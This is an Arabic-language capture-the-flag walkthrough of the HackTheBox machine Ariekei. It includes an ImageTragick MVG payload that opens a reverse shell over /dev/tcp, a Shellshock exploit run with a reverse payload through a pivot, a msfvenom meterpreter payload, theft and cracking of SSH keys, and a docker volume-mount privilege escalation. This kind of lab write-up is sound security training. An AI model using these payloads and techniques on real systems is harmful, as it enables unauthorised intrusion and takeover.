> For the complete documentation index, see [llms.txt](https://mhzcyber.gitbook.io/vulnerability-research-ar/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://mhzcyber.gitbook.io/vulnerability-research-ar/hackthebox-ar/arieke-ar.md).

# Ariekei - بالعربي

حل Ariekei بالعربي

![Let's show some fucking INSANE bb](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMdAs3k3l-48Q06zcGz%2F-MMdB9_7aVPViQYU-7_s%2Fimage.png?alt=media\&token=9040f83b-53a6-4640-9b4d-768ff617c3e8)

1- تبدأ الاول بعمل Scan على الماشين ب nmap عشان تشوف ال Open Ports الموجودة و ال services/الخدمات و شو منهم فيه ثغرة/vulnerable فتستغله و طبعا بدون عمل استطلاع/recon او enumeration ما ممكن تبدأ اي عملية Pentesting او Hacking<br>

![nmp scan results](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMdBRIVca-lAoQRnuMY%2F-MMdFzL3Uyp4NOCGRz0M%2Fimage.png?alt=media\&token=603a1fa2-50ba-47ae-ad25-9903f1268cda)

طيب ناو تحلل نتائج الفحص و متل ما شايف عندك

#### 22 tcp (ssh), 443 tcp (https - web server), 1022 tcp (ssh too !)<br>

طيب هون في شيء مثير للفضول ! ليش في اتنين ssh ??<br>

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMdS-lotZn8hSIxzJc0%2F-MMdVjdJxuGZ9jLPG4Pp%2Fimage.png?alt=media\&token=a6a5857b-e71c-4f20-8285-8267b03af0e7)

الي محدده بالاحمر بدل على بعض الامور منها ان في &#x20;

Network Address Translate (NAT)

بحصل على اكتر من هوست./ Multiple Hosts

متل ما شايف بالصورة في  DNS ف نحن رح تاخد ال subs هدول و تحطهم بال&#x20;

```
/etc/hosts
```

![subdomains added to /etc/hosts](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMdS-lotZn8hSIxzJc0%2F-MMdXcBwfXScdaq1mis_%2Fimage.png?alt=media\&token=85911927-76de-4494-aac6-5f968e88771c)

هلق تتصفح ال subdomains لي ضفتهم <br>

![https://calvin.ariekei.htb/](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMdYrCBv2bqfpf-gg91%2F-MMdaGlNIbCxz2Hr3_0D%2Fimage.png?alt=media\&token=141c2265-74e0-4aa8-836b-ccc6d8ef6cde)

![https://beehive.ariekei.htb/](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMdYrCBv2bqfpf-gg91%2F-MMdaM6Zv2L_A9Pu5H33%2Fimage.png?alt=media\&token=3e73eab3-bcbe-4941-be01-4ea09414e9d8)

طبعا كلعادة على الويب لازم تعمل استطلاع و فحص / scan & enum عشان تشوف لو في شي تستغل او تستفيد منه و يخليك تفهم اكتر عن البيئة الي بتهاجمها و بما انه ويب  ف رح استخدم شوية ادوات متل dirb, gobuster , dirsearch, wfuzz&#x20;

اول شي بدأت ب dirb على  <https://calvin.ariekei.htb/> و لقيت هذا

```
https://calvin.ariekei.htb/upload
```

![https://calvin.ariekei.htb/upload](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMdapUJ66KbGmvjZ_Rs%2F-MMfsg4N96eiVCm3Pli4%2Fimage.png?alt=media\&token=6c5e9585-94fe-40b6-9ff7-fb03f0c40a95)

و لما شفت نتائج dirb على <https://beehive.ariekei.htb/> لقيت

```
+ https://beehive.ariekei.htb/cgi-bin/ (CODE:403|SIZE:295)
```

رحت مشغل عليه wfuzz كلاتي :&#x20;

```
wfuzz --hc 404 -u https://beehive.ariekei.htb/cgi-bin/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  
```

و اول شغلة وقعت عليها عيني هي

```
000000171:   200        36 L     99 W     1255 Ch     "stats"
```

نتصفحها&#x20;

![https://beehive.ariekei.htb/cgi-bin/stats](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMfubuNgxtHamN0wBxS%2F-MMg-eFwaX2ft1qjvyYg%2Fimage.png?alt=media\&token=169c1c09-d348-4962-a639-a86ffeaef14c)

هي ثغرة shell shock و للاسف بعد عدة محاولات سواء يدوي او بالاستغلال هاد  ([اضغط هنا](https://www.exploit-db.com/exploits/34900))\
ايضا ما اشتغل و واضح ان في  WAF فعديتها و رجعت لل upload فوق, ازا طلعنا على الكود المصدري / source code رح نلاقي الاتي :

![view-source:https://calvin.ariekei.htb/upload](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMg-nkkzDzB6uZWdsiC%2F-MMg0g2s-PNWnTTFF4vU%2Fimage.png?alt=media\&token=9e8d4cd5-cf6d-42c5-adb9-955619dcc906)

الوجهين هدول علامة لل tragic و الي معناه "مأساة" و بما انو الامر upload image ف رح تفهم ان الدلالة  لاحد الثغرات اسمها imagetragick هي موقع خاص بالثغرة([اضغط هنا](https://imagetragick.com/))و انا رح اشرحها الان&#x20;

{% hint style="info" %}
حسب الموقع الثغرة هي الها اكتر من شكل و هي تحديدا بالمكتبة / library الي اسمها [ImageMagick](https://imagemagick.org/index.php) و الي بحد ذاتها موجودة بأكتر من لغة برمجة.

طيب من الاشياء المصابة بيها هي RCE و السبب وراء ال RCE ان ما بحصل عملية تصفية / filtering ل الي بتم ادخاله من قبل المستخدم بشكل صح و الامر بحصل كلاتي :&#x20;

قال ان imagemagick بتسمح بمعالجة الصور باستخدام مكتبات خارجية عن طريق ميزة اسمها **delegate**  و الي هي اصلا فيها&#x20;

**system()**&#x20;

و الي بتاخد الامر من ملف config اسمه delegate.xml فبسبب التصفية الغير صحيحة للمدخلات الي بتوصل للعامل / parameter الي هو&#x20;

**%M**

فبتحصل حقن الاوامر و وحدة من ال delegate's الافتراضية ان بقبل يعالج https request بالشكل الاتي :

&#x20;

```
"wget" -q -O "%o" "https:%M"
```

مكان ال %M بحصل الحقن كلاتي :

```
`https://example.com";|ls "-la`
```

فشكل ال payload رح يكون كلاتي:

```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|setsid /bin/bash -i>/dev/tcp/10.10.14.10/1111 0<&1 2>&1")'ms
pop graphic-context
```

طبعا غير ال ip & port  لل ip & port الخاصين فيك و للعلم رح يكون الملف بصيغة **mvg**&#x20;

{% endhint %}

بعد تكون شغلت ال netcat و رفعت ال exploit.mvg رح يجيك ال shell

![Got shell](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMgLu1ojDerhgsxUkK3%2F-MMgOgCwvqRTWLtHch57%2Fimage.png?alt=media\&token=3c76094a-e70e-48fa-9e0e-a45e08070f6b)

الي يعتبر غريب هون ان انا Root على  طول !\
اول ما شفت common عرفت ان الموضوع فيه Docker

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMgLu1ojDerhgsxUkK3%2F-MMgP95RVmKn7np92UNh%2Fimage.png?alt=media\&token=75cc9934-bdc0-488a-8999-e88408855ad3)

طيب بما ان الموضوع فيه Docker هاد بدعم نظرية وجود NAT على multiple hosts \
حاولت اعمل ifconfig بس ما موجود على هي ال Docker ف تروح لل&#x20;

**/common**

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMgLu1ojDerhgsxUkK3%2F-MMgPrR-O_Rcw40be-cL%2Fimage.png?alt=media\&token=31deec29-82a8-4b27-b2e8-0c7b86156160)

في&#x20;

**.secrets**

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMgLu1ojDerhgsxUkK3%2F-MMgQAtN3nPdtaJ1v5hx%2Fimage.png?alt=media\&token=3dd9f384-e63e-42f0-92e7-f1acf7852ec9)

رح تاخد ال **bastion\_key** و نستخدمه عشان ن SSH على البوكس\
طبعا ما تنسى تخلي صلاحيات الملف 600 \
طيب مع اول محاولة هون ما اشتغل و كان الامر متل&#x20;

![](https://media.giphy.com/media/457NTDOuMmDfO/source.gif)

بعد محاولات

![](https://media.giphy.com/media/SWoRKslHVtqEasqYCJ/source.gif)

بالاخر اتذكرت ان في بورت تاني لل ssh فجربته كلاتي :

```
ssh root@10.10.10.65 -i bastion_key -p 1022
```

![SSHed](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMgQtf3VXP6zoopZk4_%2F-MMgUDO7ICCAAFDifOXY%2Fimage.png?alt=media\&token=befd46e2-7311-46f8-bad2-1f01b1cf061b)

حاليا انا داخل ك SSH يعني الحياة اجمل  فخلينا نجرب ال **ifconfig**&#x20;

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMga_qZuawReENjzKwb%2F-MMgdZt7E1VSFrbUXykX%2Fimage.png?alt=media\&token=56f6a12d-1a10-40bc-8987-1308eabc6671)

![](https://media.giphy.com/media/l0HlFZ3c4NENSLQRi/source.gif)

بس ليش ؟ لانو المعلم بالاحمر بدل ان نظرية ال NAT on multiple hosts صحيحة و في هون متل ما شايف two network interfaces و الي بعني بهي الحالة ان الجهاز نفسه متصل ع شبكتين و كل شبكة على interface لوحده و بسموا الشكل هاد

**Dual Homed Machines** or **Jump point/Jump host**

و الفكرة انها بتساعد بال **Pivoting** !

طيب ازا بتتزكر بال common كان في مجلدات تانية ما شفتها \
بال&#x20;

> /common/containers/bastion-live

ازا عملت cat لل  Dockerfile رح تشوف الاتي:

![Root Password](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMg_-3V3fMKkDsWCIEJ%2F-MMgaPgVoa06slJaZUGq%2Fimage.png?alt=media\&token=e9bdfb64-4fba-4368-9942-f1fe776f10f8)

هي كلمة السر لل رووت , طبعا نحن هيك هيك رووت بس ممكن يفيدنا فيما بعد\
انا ما دورت هون كتير و رحت لل

> /common/network

لان الاسم شدني كتير و في جواه ملف باسم **make\_nets.sh**&#x20;

![make\_nets.sh](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMgeOVJCCjYqLuWbSog%2F-MMgepds-xl3G7JEmWOJ%2Fimage.png?alt=media\&token=f61bd69c-097f-4779-beae-01628bf0e505)

طيب متل ما واضح عبارة عن ملف باش بطبق امرين و مكتوب كل امر شو شغلته بتعليق فوقه

> اول امر رح يعمل حاوية / container معزولة و مابدخلها نت
>
> تاني امر رح يعمل حاوية / container بس هي live و بدخلها نت

انا بالاصل بعرف الشبكتين الموجودات عندي من النتائج تبعيت ال ifconfig بس هون في شوية تفاصيل اكتر متل ال range و ال gateway \
طيب شو فيني اعمل اكتر ؟ انا عن نفسي و المفروض يصير ان تعمل فحص و استطلاع اكتر و تفهم شو في جوا و على الاقل تعمل ping sweep تشوف مين موجود.\
خليني اقول ان بال real world ازا الحماية ما واقعة ما فينك تلعب كل هاد اللعب بهي السهولة 🙂&#x20;

قبل ما ابدأ عملت ping بس كرمال اتاكد ان كلو شغال و مافي شبكة واقعة او اي مشكلة

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMggLQcAUZNN4legxfe%2F-MMgh12oFU8ElzopQFqg%2Fimage.png?alt=media\&token=aad74c73-7f75-4c31-b1f2-7802b3bdca78)

ناو نبدأ, انا استخدم liner command و الي هو عبارة عن امر لينكس واحد, كرمال اسهل الموضوع على نفسي \
روح على ال /tmp لان هنيك مسموح تكتب&#x20;

```
for i in $(seq 2 254);do echo 172.23.0.$i;done > 172.23.0.1.txt  
```

هاد الامر بس بطبع من 2 ل 254 مكان اخر خانة بال IP و بحفظهم بملف بنفس اسم الشبكة

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMghtjseUm2XsfXpeoz%2F-MMgiaesGGnvlwLEnp8x%2Fimage.png?alt=media\&token=34ffef5f-066f-47d6-87dd-ecba95345984)

رح تعمل نفس الموضوع على الشبكة التانية

{% embed url="<https://172.24.0.1>" %}

```
for i in $(cat '172.23.0.1.txt');do ping -c 2 $i;done > pinged.txt  
```

هو بدأ ال ping sweep و حاليا رح يحصل ping لمرتين على كل IP و رح يحط كل النتائج جوا pinged.txt&#x20;

```
cat pinged.txt | grep ttl | cut -d " " -f 4 | cut -d ':' -f 1 | sort -u > alive.txt  
```

ببساطة هون بفلتر النتائج تبعيت ال ping للشغال بس و بحطهم ب ملف اسمو alive.txt&#x20;

```
for i in {22,21,23,80,443,139,445,1022};do nc 172.23.0.253  $i;done  
```

هون حطيت ال nc IP جوا loop بحيث يحاول يتصل على ال IP عبر كل ال ports هي و هيك بعرف شو ال ports المفتوحة

كرر هي العملية على الشبكة التانية !

طيب بعد كل هيدا الكلام و ماطلعت بشي ههههههه\
دماغي :

{% embed url="<https://media.giphy.com/media/l4hmWKVDDUpiq355K/source.mp4>" %}

نرجع مرة تانية لل /common و لل /containers \
و بعد لف و دوران و enum و قرأت كل الملفات لقيت هاد الملف بالمسار الاتي:

> /common/containers/waf-live

و يلا&#x20;

```
cat nginx.conf
```

![cat nginx.conf](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMgzyEVI9oJcbVQrSLs%2F-MMh-ZaBCQmCK5gyW1rd%2Fimage.png?alt=media\&token=ef49c906-701f-4589-9a72-81e8e45d622e)

بالاصل بعرف ان في عندي subdomain باسم beehive.ariekei.htb ف واضح ان التحت هو ال IP الخاص فيه و الي بعرفه كمان ان هاد ال subdomain مصاب ب shellshock و الي ماقدرت استغلها بسبب ال WAF , فرح استغلها بنفس الاستغلال بس و انا جوا !

1-شغل ع جهازك ال SimpleHTTPServer \
2- روح لل tmp/ و حمل الاستغلال على البوكس من جهازك ب wget \
3- نشغل الاستغلال

```
python 34900.py payload=reverse rhost=172.24.0.2 lhost=172.24.0.253 lport=1234 pages=/cgi-bin/stats  
```

{% hint style="info" %}
حطيت ال lhost=172.24.0.253 لان هاد ال IP الخاص فيني على ال eth1 interface فمعنى اخر هاد ال IP الي على نفس شبكة ال docker container الي عليها ال server المصاب !
{% endhint %}

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMh12_sh6cuJm1kAIGA%2F-MMh1yQVzD1MqfEa-Hgh%2Fimage.png?alt=media\&token=4a03809b-b4d6-4c85-8a87-b4cf9255ae46)

و بوووم , نجح ال Pivoting !&#x20;

حاولت اشوف ال user.txt و ما نفع ما معي صلاحيات

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMh25e3PnPxtYXAkwyW%2F-MMh2_8cRe-t6HzJ8ZYd%2Fimage.png?alt=media\&token=526820ed-a57a-4b2a-af94-f66d945cbfa0)

و ال shell جدا سيء , فرح اسوي تكنيك بسمى&#x20;

#### persistence

رح استخدم هون ال msfvenome & msfconsole \
كرمال تعمل ال payload بالاول

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf  
```

و حاليا شغل ال msfconsole و استخدم ال multi/handler و حط ال options الخاصة فيها\
و بعدها ارفع ال payload على البوكس بال wget متل ما عملت من قبل.

```
chmod +x shell.elf
```

و شغل ال shell.elf&#x20;

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMh4bso5ZdrnYdxrKJL%2F-MMh5YcFHE_6_z_SoM6C%2Fimage.png?alt=media\&token=68b1f92f-dac9-41be-84f9-64c7bec4367a)

حاليا فيني استخدم خاصية shell و احصل shell اكثر اناقة 😂😂\
بعدها استخد الامر التالي :

```
python -c "import pty;pty.spawn('/bin/bash');"
```

بحيث spawn TTY shell&#x20;

ناو بعد تفكير عميق اتذكرت ان معي ال root password ف عملت su و حطيت كلمة السر الخاصة بالرووت و صرت رووت 🙂

![I'm R00t](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMh6U_k8HZp_HH9pUJ4%2F-MMh7HW7QtYUvBBWVDwu%2Fimage.png?alt=media\&token=c75f4255-319b-4d74-a6c2-55434763566b)

بعدها بس cat user.txt و حصلت اول علم / flag !

بالمسار هاد في  id\_rsa key رح  تاخد و تحاول تتصل فيه

> /home/spanishdancer/.ssh

متل ما شايف عم يطلب كلمة سر , فلازم نكسره / crack&#x20;

![id\_rsa asks for passphrase](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMh7X_F2avvPrWv1dKs%2F-MMh9VXBezH0BE5Ym074%2Fimage.png?alt=media\&token=c06542ad-337e-4dd7-9ebc-6c42a8c24cb5)

لحتى نكسره بالاول رح نستخدم اداة ssh2.john.py&#x20;

```
/usr/share/john/ssh2john.py id_rsa > id_rsa_john  
```

```
john id_rsa_john
```

![Got passwords](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMh7X_F2avvPrWv1dKs%2F-MMhBsyRJEVQqBZCgBbP%2Fimage.png?alt=media\&token=a66d3898-0b1e-4914-802d-220f14da853e)

> purple1

![SSHed](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMhC25sh2RAqdI4kBfL%2F-MMhCVCN8e2I_N8MW4J2%2Fimage.png?alt=media\&token=20390cc2-e5d3-497a-8468-7e441ccb8f28)

متل ما شايف هون فيني اشغل docker&#x20;

![](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMhCibFxRA6XoCU5sNs%2F-MMhDGdRN0czOiIDBxWM%2Fimage.png?alt=media\&token=f3b69590-f363-4e2d-be23-6db5c8cb503e)

بعد ما قرأت حبتين حلويين عن ال docker exploitation عرفت كيف استغل docker بحيث اجيب root , الامر مشابه لل lxd exploitation&#x20;

```
docker run -v /:/root -i -t bash
```

حسب ما فهمت من ال help و ال write ups الي قرأتها الي بحصل كلاتي :&#x20;

{% hint style="info" %}
1-ال v- عشان ال volume \
2- t- عشان ال tty\
3- i- لل interactive \
ف الي بحصل اني انا متل بنسخ كلشي بال / و الي هو كل  ملفات النظام لداخل حاوية / container جوا المجلد الي حطيت اسمه متل هون سميته root ف رح لاقي كل مجلدات النظام منسوخة ل جوا ال root لو حطيت شيء اخر متل tmp رح تلاقي كلهم منسوخ لجوا ال tmp
{% endhint %}

<br>

![I'm the R00t of The R00t](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMhFFjot--U6RIjDLb5%2F-MMhHw4RWctsRX6pFv_c%2Fimage.png?alt=media\&token=c5d4af49-7bef-4d24-92f4-d159f03c2524)

![The End](https://548817836-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MK6emPkt7Vmvi_L4pYE%2F-MMhFFjot--U6RIjDLb5%2F-MMhIHUohA7rkZ-0RsJD%2Fimage.png?alt=media\&token=c749089e-b6b7-446c-a772-57f9f73a2dd9)

و بهذا يا صديقي انتهت حلقتنا.\
السلام عليكم.
